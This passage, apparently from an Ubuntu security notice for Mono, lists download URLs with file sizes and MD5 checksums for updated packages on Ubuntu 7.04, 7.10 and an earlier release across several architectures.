      Size/MD5:   832070 291435407e3c67a2db356b4f914ee19c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:    93104 f0cc7968608f2ad6bedf45aad00f9378
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:    15982 b7dfed8a7c7c7ecb6f531d76af22dc41
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:    53726 4efd6f3f1d8cfe48721c9faa9cc075ca
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:   697248 3cdf89c0b98ba0258ea11a8471e1d5bf
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:    15946 bd753c58bfc05f0fd65c292a4d5602b7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:  1107090 5651b5faaba79327ce58024c2a61b4ee
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.2_i386.deb
      Size/MD5:     1260 24efdbd40f336c82e85360a54f82966b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:  1109110 5e33e701a3e6d24f26b150acd2b44247
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:   832468 40da31afadf1ee999e56298065b5f9f4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:    93962 467a94dd9e8963f23a1372d74ec7c6e8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:    15982 8b6bea392f883e37bf781bbfbac071d2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:    58782 4b8fdcd301d575963c665a88db727092
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:   716252 b8c634dac109aa74da5e71a9032180d3
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:    15950 08f08604c506fed9a28b0ed15a0aeb51
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:  1160900 a80975550f34d9ab93fb3ee3713c4f39
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.2_powerpc.deb
      Size/MD5:     1264 8adcc5f9ac48eb59c9229a11e83e6485

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:  1124734 09a0b5466a993d604729cba21f37d9b2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:   839440 ac21c40809f1cc5b5c2a8a3ef9d0abf4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:    93558 887f446378a42bc2b30393619a43c3ac
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:    15980 7b6ce56af425487ab4ff31732b470a2d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:    56260 bbc2661b4048a653db7630756d3d54af
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:   704902 2c13f7c82a438c5bbb5fb2ea32c72367
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:    15950 c51bfa76061a2f4a438f27911af4b584
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:  1110200 066875ba92f55267267d57eccfb3fcc5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.2_sparc.deb
      Size/MD5:     1260 66e49849d82637b28f88e7516cc7a31e

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1-1ubuntu1.1.diff.gz
      Size/MD5:    47621 cd897f3195db6c081a4e741b7df0edcb
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1-1ubuntu1.1.dsc
      Size/MD5:     2452 ca82ee60f2f4e5adf65bc629acf46fcc
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1.orig.tar.gz
      Size/MD5: 20694945 4e4cdb6f98f1ea62bb1900f214c55e58

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    22014 131b26450f33cf1747afde278c2deec6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    21946 74d4cd7d1037fa64847519c6df87ff95
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-cairo1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    48860 fde5a1f531f39b3bd89c9b9213ca527f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-cairo2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    48656 956adfd5fd62f4bb8e8dce56bd19e38f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  1879974 88be3dc1d9cec8e85b8ae06ee2bd6c22
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  2144548 6acf9bc711b3b321b5ae174d62d770e4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    67620 7fb13923a58cfa973ca2dcaf74e06e73
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    71376 ced0bdbc52bce2cba09a07a9e407cd06
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-microsoft-build2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   226586 253cb8946440908cb59b66776e4e6c55
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   103062 a8525a2a52d35dbd3e7b0c4cacc29d56
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   103080 c569ebc6557469234f3cf3c5bcbc0210
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-relaxng1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   179986 c974132fa48d5a1c345f38f095facedc
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   252394 9838b79dd4b468943f0ab410946f2188
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   253568 bcaaacd962a89669c8d9fe4e4c736054
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.6-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   111964 3ffa06961558e4483212fdae835d851a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.84-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   134164 f2acbc2443f92184918c3c98ab9de4b6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip2.84-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   134216 01de9830de8e2a32575c462b2e8d517e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sqlite1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    47110 7a9850142d7626b00794f703e677d478
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sqlite2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    55998 0dc9aa3d14d7718fea1b94bae23d6319
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   462328 72ece8d72a42e54cbc7284dfdbf62e00
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   563166 8a45c1608a35fcadbe051b015d6a4d5a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-runtime1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   121798 eda743d7fc277b8dbc39794dd104c79c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-runtime2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   139712 bf80c1d5d7bd846f17da32f0f7215025
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   791618 333430724f43b5378479fb698ee3e486
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  1575472 e06545176fd76beb8713615af1b5d29c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  1805890 85d9312224d8535dcf21c11512deff1b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  2466720 0b514eb292cd5d5c19896ed164a06249
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  1501014 c9d89231925a26671d3febe9bc1b48d2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  1902876 8d0b889b8269cffb917120c470d72258
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   412734 e1e5b880522d47c3ff2bb538004ef610
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   412750 d68d7787541b7dff8f3ae0969e6f218c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gac_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    31966 5f2e745f03cb1b1ceb153572754069b6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gmcs_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   882706 4709798914444b14fd520cb62608769b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-mcs_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:  1047490 502702aa9438d586db51dc72f9401e8c
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.1-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    93650 1a90e3cfe65aa520e2f140c7947e0079
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.2-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    93726 774841f16232158919895331d72197d0
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-c5-1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   237104 6101a28f5db1f4b1124266d4133f7919
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd7.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    26628 ab32b503762f29a97c455dcd554db885
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd8.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    26840 8b6b9efd3f1e2c9b77adec4132ed0dd6
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-firebirdsql1.7-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   298346 6222f6db6eb1a7c0f737c869155fda22
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   224878 7c248f659a539d9ff3fa0b2efa0520a4
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   224932 22d807e0c75c244ae139357bcdac8c96
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft7.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   274820 0b9ca8e261b75d57069d5405b289947b
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft8.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   274870 7321cff315431388d206f2f2bfd7e63a
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   134646 8c508cf0406ff01dcfc844de50c54b49
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   134652 326a757a35c0474a997aa56ab0291f16
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   116912 f3ff44891c6da327f90d96a4cfe6b108
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   116434 0a9a02bad925f1319ed8ff0da213fa53
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-relaxng2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   180480 b5d28848cdcd72a5e50f8316c4742f83
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-sharpzip2.6-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:   112032 e1c4d93a198e6c75e37da02f3ecf7ae2
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    50764 65f91893ff401482619b1f71b075105b
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    50710 7ef70b0eaca84db0819fd5e5473c108a
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging1.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    66280 5b8e417874db9e04f7d49f85fe318c9c
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging2.0-cil_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    66302 7fda24b95fda25d3a312f93c67e821de
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-mjs_1.2.3.1-1ubuntu1.1_all.deb
      Size/MD5:    28590 b598c3db33e847a3137408a6c1c9b393

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:  1160054 9793f7913c45c9c5ad2201b289b453d5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:   872514 9c86734c35784d72af074e32bd7f7d8e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:    98922 101a536adcb35a8681c99e1e08f6347d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:    18162 c5a85008ea6779a153ed1d9ee601442e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:    62514 a139c143e11ea35a0a3716edc6387ca7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:   761144 87853b5708df1ad7ecdccc70c83cefec
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:    18124 91d4159f6231ea9275abdfd97c58ea07
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:  1158330 21d562a70c2c5068c33af3e77b12f0fb
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1-1ubuntu1.1_amd64.deb
      Size/MD5:     1254 4c07d8202a0b2ebb14338edf1c53ef24

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:  1076874 7578be98742ad2b74cddb564f8792470
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:   800388 b761b2d4f9c9b94ecfb9e44862b4c276
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:    98560 d32ba6bab17821c834b3613bdff55ee4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:    18156 e391379b597aeedd8a17fcc64f63b6d0
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:    55968 4caf0a4657ae9c1e1a934c0b91a437e6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:   688846 a27b4cc0a303d04e8509a0bbbdb4e8e8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:    18128 0c2d17599aae62bec7d950a2c21710d7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:  1077216 4e64f4e62fb07d0427565a4d0280ed96
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1-1ubuntu1.1_i386.deb
      Size/MD5:     1256 af5d4000f80483ae05fba499a9bdb542

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:  1095250 d73a18c74c51788d7b6861dc4bf6ade7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:   821034 747e67a32d87c933003991b5e8ab1f6f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:    99572 52474d115b4cf8fe5c1391a3d3a29496
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:    18160 5d5c7ed5c8c249235df305bc01064d37
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:    61562 fd0fcf3feb6b48d7e6ac2d968cd38717
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:   682356 51f11710215f146cc2b3f6070b4c5a10
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:    18130 4fdda57d271510d5d8f657ef227e025e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:  1090966 44e365a5c6271cf4f7f18979ff6ca0ae
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1-1ubuntu1.1_powerpc.deb
      Size/MD5:     1256 0d7432eff9d7712adfddb7b459fe1ed8

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:  1151818 6885ab67def02ab6fe377cca6c887fca
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:   825326 5c11f932a69fa2ce7f88b2214f69819f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:    99036 eaaddf39abd6aa3754a1850a8283fae8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:    18164 488fd864d5fa1158a3f86aec7475eb80
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:    58562 bd5284e8679124b4e80572cde9467e37
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:   702520 124fb06bca6d2f991a119878169c166c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:    18130 4ea1951f47a5af86282bbbea9115e39e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:  1093254 4a8e0cea9ec1508681837a9b9ecfabd4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.3.1-1ubuntu1.1_sparc.deb
      Size/MD5:     1256 f4be19c54303dd9c469ffd9d1fe0c0fd

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4-6ubuntu6.1.diff.gz
      Size/MD5:    57734 d130b3126e9f5f7bf2a8b1a02a2c6527
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4-6ubuntu6.1.dsc
      Size/MD5:     2484 e7027c6ee6f8c2a03c6ac657b0942553
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4.orig.tar.gz
      Size/MD5: 22003350 933804f591cce706c7c8e2e43b0c0161

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:     4562 f524bc67ee8fc58f665b31a2d1e343b3
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:     4538 e58206ccd96536ffd2b5116281122699
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-cairo1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    19230 96fdefee8bd93395a04fc5aaee61cb53
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-cairo2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    19078 0c3ddc8dbe1126079d91a7d746f7f8c2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:  1085538 6ec480375f85c6aab45050b9e2ef742e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:  1222200 0e3d7c8481ee74d62b1d87f0cf717196
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    28048 b2b1d9458df367ad48839e037f353039
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    29632 a478e5939afe8914c7553029aae87a92
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-microsoft-build2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   113434 d864c7956b19b7bd18358d9d9c5e7991
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    44050 9bdd5eccc1f71831703348891c1b0deb
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    44144 a77d4e685cf811d2ac44b21b3af677ae
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-relaxng1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    83340 64f61cf09a8f249bc39c76a9e7f782f5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   114074 25f6bf54d6f280f6fa4797210f945438
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   114774 6263b62ead55fc1ac8a6c6a1123c96b1
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.6-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    48544 a1725e7618dd3ebadabb23e17f9f1d48
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.84-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    58608 dd83d32101afbcf922ec188aeaa98ce2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip2.84-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    58674 2b5e45fc0f6b6a926e454b93bfccf38d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sqlite1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    34502 ab48fe6e5da5998070b870a675d5e186
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sqlite2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    67036 235f3c55b2403093065c92676f6b4841
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   221936 f9e87d67bc0829b8cdc8ef942b14aa8d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   278826 d738e1b755fdf4c3e2538da4ce4b577a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-runtime1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    60466 011b7885b9c468a999423d245899389b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-runtime2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    69254 f263009a6a735abc5e2f32ebc046f756
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   389644 05fccce9fccec4ce6e20917b6816b50a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   793396 3fad16266a872d219e62b9d58036cac8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   896328 719c356ebf4707e949e9dbadbd1f4728
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:  1316912 eb2c23eaeeb7afb5b7e3a0bf2da68067
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   852100 c094f90fa8d708ad9c0ef57ef7bef922
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:  1046878 c22ee62fb5c3a766fd17ed5aaca9ea05
